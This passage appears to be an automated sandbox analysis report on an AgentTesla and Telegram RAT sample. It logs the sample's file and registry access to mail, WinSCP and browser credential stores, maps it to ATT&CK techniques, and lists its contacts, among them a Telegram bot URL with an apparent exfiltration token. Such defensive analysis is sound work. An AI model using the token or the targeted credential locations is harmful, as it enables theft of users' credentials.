              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_018EF6D0 GetUserNameW,15_2_018EF6D0

              Stealing of Sensitive Information

              barindex
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR
              Yara detected AgentTesla
              Source: Yara matchFile source: 0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: Yara matchFile source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR
              Yara detected AgentTesla
              Source: Yara matchFile source: 0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts211
              Windows Management Instrumentation              		11
              Registry Run Keys / Startup Folder              		112
              Process Injection              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		1
              Account Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium1
              Web Service              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              PowerShell              		Boot or Logon Initialization Scripts11
              Registry Run Keys / Startup Folder              		1
              Deobfuscate/Decode Files or Information              		21
              Input Capture              		1
              File and Directory Discovery              		Remote Desktop Protocol1
              Data from Local System              		Exfiltration Over Bluetooth1
              Ingress Tool Transfer              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information              		1
              Credentials in Registry              		114
              System Information Discovery              		SMB/Windows Admin Shares1
              Email Collection              		Automated Exfiltration11
              Encrypted Channel              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
              Masquerading              		NTDS211
              Security Software Discovery              		Distributed Component Object Model21
              Input Capture              		Scheduled Transfer3
              Non-Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
              Virtualization/Sandbox Evasion              		LSA Secrets2
              Process Discovery              		SSH1
              Clipboard Data              		Data Transfer Size Limits14
              Application Layer Protocol              		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common112
              Process Injection              		Cached Domain Credentials131
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items1
              Hidden Files and Directories              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              System Owner/User Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
              Remote System Discovery              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
              System Network Configuration Discovery              		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830846 Sample: izwFjkhFJm.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 57 api4.ipify.org 2->57 59 api.telegram.org 2->59 61 api.ipify.org 2->61 71 Snort IDS alert for network traffic 2->71 73 Multi AV Scanner detection for submitted file 2->73 75 Yara detected Telegram RAT 2->75 77 5 other signatures 2->77 8 izwFjkhFJm.exe 1 8 2->8         started        12 Oefdyik.exe 4 2->12         started        14 kDPmkTm.exe 3 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 51 C:\Users\user\AppData\Roaming\...\Oefdyik.exe, PE32 8->51 dropped 53 C:\Users\user\...\Oefdyik.exe:Zone.Identifier, ASCII 8->53 dropped 55 C:\Users\user\AppData\...\izwFjkhFJm.exe.log, ASCII 8->55 dropped 91 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->91 93 May check the online IP address of the machine 8->93 95 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 8->95 103 3 other signatures 8->103 18 izwFjkhFJm.exe 17 5 8->18         started        23 powershell.exe 16 8->23         started        25 izwFjkhFJm.exe 8->25         started        37 2 other processes 8->37 97 Multi AV Scanner detection for dropped file 12->97 99 Machine Learning detection for dropped file 12->99 101 Encrypted powershell cmdline option found 12->101 27 Oefdyik.exe 12->27         started        29 powershell.exe 12->29         started        31 Oefdyik.exe 12->31         started        33 powershell.exe 14->33         started        35 powershell.exe 16->35         started        signatures6 process7 dnsIp8 63 api4.ipify.org 173.231.16.76, 443, 49699, 49702 WEBNXUS United States 18->63 65 api.telegram.org 149.154.167.220, 443, 49701, 49715 TELEGRAMRU United Kingdom 18->65 67 api.ipify.org 18->67 47 C:\Users\user\AppData\Roaming\...\kDPmkTm.exe, PE32 18->47 dropped 49 C:\Users\user\...\kDPmkTm.exe:Zone.Identifier, ASCII 18->49 dropped 79 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->79 81 Tries to steal Mail credentials (via file / registry access) 18->81 83 Creates multiple autostart registry keys 18->83 39 conhost.exe 23->39         started        69 api.ipify.org 27->69 85 Tries to harvest and steal browser information (history, passwords, etc) 27->85 87 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->87 89 Installs a global keyboard hook 27->89 41 conhost.exe 29->41         started        43 conhost.exe 33->43         started        45 conhost.exe 35->45         started        file9 signatures10 process11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              izwFjkhFJm.exe33%ReversingLabsByteCode-MSIL.Packed.Generic
              izwFjkhFJm.exe53%VirustotalBrowse
              izwFjkhFJm.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe53%VirustotalBrowse
              C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe33%ReversingLabsByteCode-MSIL.Packed.Generic
              C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe33%ReversingLabsByteCode-MSIL.Packed.Generic

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              27.2.Oefdyik.exe.400000.0.unpack100%AviraHEUR/AGEN.1215472Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://api.telegram.org40%URL Reputationsafe
              https://urn.to/r/sds_see0%URL Reputationsafe
              https://urn.to/r/sds_see0%URL Reputationsafe
              http://james.newtonking.com/projects/json0%URL Reputationsafe
              http://james.newtonking.com/projects/json0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              api4.ipify.org
              		173.231.16.76
              		truefalse
                		high
                api.telegram.org
                		149.154.167.220
                		truefalse
                  		high
                  api.ipify.org
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                      		high
                      https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocumentfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.ipify.orgizwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://api.telegram.org4izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.orgizwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.newtonsoft.com/jsonschemakDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.newtonsoft.com/jsonkDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.nuget.org/packages/Newtonsoft.Json.BsonizwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://urn.to/r/sds_seeizwFjkhFJm.exe, 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Oefdyik.exe, 00000010.00000003.350241143.000000000472E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://api.telegram.orgizwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
